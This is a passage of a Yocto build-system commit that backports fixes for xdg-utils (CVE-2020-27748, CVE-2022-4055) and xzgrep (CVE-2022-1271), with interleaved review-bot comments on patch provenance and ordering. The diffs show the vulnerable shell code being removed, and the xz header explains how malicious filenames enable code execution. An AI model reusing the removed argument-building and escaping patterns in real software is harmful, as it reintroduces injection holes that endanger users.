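+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+if [ -z "$TO" ] ; then
+NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+NEWMAILTO="${NEWMAILTO},$BODY"
+fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+"$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+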
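Review bot: The `Upstream-Status: Backport` line in this patch header names no upstream commit, and no Signed-off-by from the person who did the backport is recorded, so the provenance of a security fix cannot be checked from the file alone. CVE-2022-4055.patch in the same commit shows the fuller form, `Upstream-Status: Backport [<upstream commit URL>]`, followed by the backporter's sign-off. The file is also named after the commit hash while the other fixes here are named after their CVE; `CVE-2020-27748.patch` would be easier to audit against the `CVE:` tag it carries.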
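--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,165 @@
+From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001
+From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
+Date: Thu, 25 Aug 2022 23:51:45 +0200
+Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes
+CVE-2020-27748, CVE-2022-4055)
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780]
+CVE: CVE-2022-4055
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+scripts/xdg-email.in | 108 -------------------------------------------
+1 file changed, 108 deletions(-)
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 13ba2d5..b700679 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -30,76 +30,8 @@ _USAGE
+
+#@xdg-utils-common@
+
+-run_thunderbird()
+-{
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+- THUNDERBIRD="$1"
+- MAILTO=$(echo "$2" | sed 's/^mailto://')
+- echo "$MAILTO" | grep -qs "^?"
+- if [ "$?" = "0" ] ; then
+- MAILTO=$(echo "$MAILTO" | sed 's/^?//')
+- else
+- MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/')
+- fi
+-
+- MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g')
+- TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+- BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-
+- if [ -z "$TO" ] ; then
+- NEWMAILTO=
+- else
+- NEWMAILTO="to='$TO'"
+- fi
+- if [ -n "$CC" ] ; then
+- NEWMAILTO="${NEWMAILTO},cc='$CC'"
+- fi
+- if [ -n "$BCC" ] ; then
+- NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
+- fi
+- if [ -n "$SUBJECT" ] ; then
+- NEWMAILTO="${NEWMAILTO},$SUBJECT"
+- fi
+- if [ -n "$BODY" ] ; then
+- NEWMAILTO="${NEWMAILTO},$BODY"
+- fi
+-
+- NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+- DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+- "$THUNDERBIRD" -compose "$NEWMAILTO"
+- if [ $? -eq 0 ]; then
+- exit_success
+- else
+- exit_failure_operation_failed
+- fi
+-}
+-
+open_kde()
+{
+- if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
+- local kreadconfig=kreadconfig$KDE_SESSION_VERSION
+- else
+- local kreadconfig=kreadconfig
+- fi
+-
+- if which $kreadconfig >/dev/null 2>&1; then
+- local profile=$($kreadconfig --file emaildefaults \
+- --group Defaults --key Profile)
+- if [ -n "$profile" ]; then
+- local client=$($kreadconfig --file emaildefaults \
+- --group "PROFILE_$profile" \
+- --key EmailClient \
+- | cut -d ' ' -f 1)
+-
+- if echo "$client" | grep -Eq 'thunderbird|icedove'; then
+- run_thunderbird "$client" "$1"
+- fi
+- fi
+- fi
+-
+local command
+case "$KDE_SESSION_VERSION" in
+'') command=kmailservice ;;
+@@ -130,15 +62,6 @@ open_kde()
+
+open_gnome3()
+{
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+if gio help open 2>/dev/null 1>&2; then
+DEBUG 1 "Running gio open \"$1\""
+gio open "$1"
+@@ -159,13 +82,6 @@ open_gnome3()
+
+open_gnome()
+{
+- local client
+- client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || ""
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+if gio help open 2>/dev/null 1>&2; then
+DEBUG 1 "Running gio open \"$1\""
+gio open "$1"
+@@ -231,15 +147,6 @@ open_flatpak()
+
+open_generic()
+{
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+xdg-open "$1"
+local ret=$?
+
+@@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do
+shift
+;;
+
+- --attach)
+- if [ -z "$1" ] ; then
+- exit_failure_syntax "file argument missing for --attach option"
+- fi
+- check_input_file "$1"
+- file=`readlink -f "$1"` # Normalize path
+- if [ -z "$file" ] || [ ! -f "$file" ] ; then
+- exit_failure_file_missing "file '$1' does not exist"
+- fi
+-
+- url_encode "$file"
+- options="${options}attach=${result}&"
+- shift
+- ;;
+-
+-*)
+exit_failure_syntax "unexpected option '$parm'"
+;;
+--
+2.25.1
+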
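Review bot: The last hunk drops the `--attach)` case, so an `--attach FILE` argument now falls through to `-*)` and ends in `exit_failure_syntax "unexpected option '$parm'"`; existing callers that pass it fail outright rather than opening a message without the attachment. The usage text and manual for xdg-email are outside this patch, so it should be confirmed that they no longer advertise `--attach`, and the behaviour change deserves a sentence in the patch header. The removed `run_thunderbird` lines carry no `ATTACH` in their `local` list, so this patch applies only on top of 1f199813e0eb0246f63b54e9e154970e609575af.patch. A recipe comment such as `# CVE-2022-4055.patch must follow 1f199813...patch` would record that ordering.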
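--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
 SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
 file://0001-Reinstate-xdg-terminal.patch \
 file://0001-Don-t-build-the-in-script-manual.patch \
+file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
+file://CVE-2022-4055.patch \
 "
 
 SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"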
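--- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
+++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Socket-based service activation daemon"
 HOMEPAGE = "https://github.com/xinetd-org/xinetd"
+DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things."
 
 # xinetd is a BSD-like license
 # Apple and Gentoo say BSD here.
@@ -12,7 +13,7 @@ PR = "r2"
 # Blacklist a bogus tag in upstream check
 UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)"
 
-SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \
+SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \
 file://xinetd.init \
 file://xinetd.conf \
 file://xinetd.default \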
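--- /dev/null
+++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
@@ -0,0 +1,96 @@
+From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Tue, 29 Mar 2022 19:19:12 +0300
+Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587).
+
+Malicious filenames can make xzgrep to write to arbitrary files
+or (with a GNU sed extension) lead to arbitrary code execution.
+
+xzgrep from XZ Utils versions up to and including 5.2.5 are
+affected. 5.3.1alpha and 5.3.2alpha are affected as well.
+This patch works for all of them.
+
+This bug was inherited from gzip's zgrep. gzip 1.12 includes
+a fix for zgrep.
+
+The issue with the old sed script is that with multiple newlines,
+the N-command will read the second line of input, then the
+s-commands will be skipped because it's not the end of the
+file yet, then a new sed cycle starts and the pattern space
+is printed and emptied. So only the last line or two get escaped.
+
+One way to fix this would be to read all lines into the pattern
+space first. However, the included fix is even simpler: All lines
+except the last line get a backslash appended at the end. To ensure
+that shell command substitution doesn't eat a possible trailing
+newline, a colon is appended to the filename before escaping.
+The colon is later used to separate the filename from the grep
+output so it is fine to add it here instead of a few lines later.
+
+The old code also wasn't POSIX compliant as it used \n in the
+replacement section of the s-command. Using \<newline> is the
+POSIX compatible method.
+
+LC_ALL=C was added to the two critical sed commands. POSIX sed
+manual recommends it when using sed to manipulate pathnames
+because in other locales invalid multibyte sequences might
+cause issues with some sed implementations. In case of GNU sed,
+these particular sed scripts wouldn't have such problems but some
+other scripts could have, see:
+
+info '(sed)Locale Considerations'
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Thanks to Jim Meyering and Paul Eggert discussing the different
+ways to fix this and for coordinating the patch release schedule
+with gzip.
+
+Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+src/scripts/xzgrep.in | 20 ++++++++++++--------
+1 file changed, 12 insertions(+), 8 deletions(-)
+
+diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in
+index a1fd19c..da1e65b 100644
+--- a/src/scripts/xzgrep.in
++++ b/src/scripts/xzgrep.in
+@@ -178,22 +178,26 @@ for i; do
+{ test $# -eq 1 || test $no_filename -eq 1; }; then
+eval "$grep"
+else
++ # Append a colon so that the last character will never be a newline
++ # which would otherwise get lost in shell command substitution.
++ i="$i:"
++
++ # Escape & \ | and newlines only if such characters are present
++ # (speed optimization).
+case $i in
+(*'
+'* | *'&'* | *'\'* | *'|'*)
+- i=$(printf '%s\n' "$i" |
+- sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
+- ');;
++ i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');;
+esac
+- sed_script="s|^|$i:|"
++
++ # $i already ends with a colon so don't add it here.
++ sed_script="s|^|$i|"
+
+# Fail if grep or sed fails.
+r=$(
+exec 4>&1
+- (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&-
++ (eval "$grep" 4>&-; echo $? >&4) 3>&- |
++ LC_ALL=C sed "$sed_script" >&3 4>&-
+) || r=2
+exit $r
+fi >&3 5>&-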
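--- a/meta/recipes-extended/xz/xz_5.2.4.bb
+++ b/meta/recipes-extended/xz/xz_5.2.4.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Utilities for managing LZMA compressed files"
 HOMEPAGE = "https://tukaani.org/xz/"
+DESCRIPTION = "XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils."
 SECTION = "base"
 
 # The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file
@@ -22,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \
 file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \
 "
 
-SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz"
+SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \
+file://CVE-2022-1271.patch \
+"
 SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6"
 SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145"
 UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar"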
diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb index 97e5e57533..18b5d8648e 100644 --- a/meta/recipes-extended/zip/zip_3.0.bb +++ b/meta/recipes-extended/zip/zip_3.0.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Compressor/archiver for creating and modifying .zip files" | 1 | SUMMARY = "Compressor/archiver for creating and modifying .zip files" |
2 | HOMEPAGE = "http://www.info-zip.org" | 2 | HOMEPAGE = "http://www.info-zip.org" |
3 | DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc." | ||
3 | SECTION = "console/utils" | 4 | SECTION = "console/utils" |
4 | 5 | ||
5 | LICENSE = "BSD-3-Clause" | 6 | LICENSE = "BSD-3-Clause" |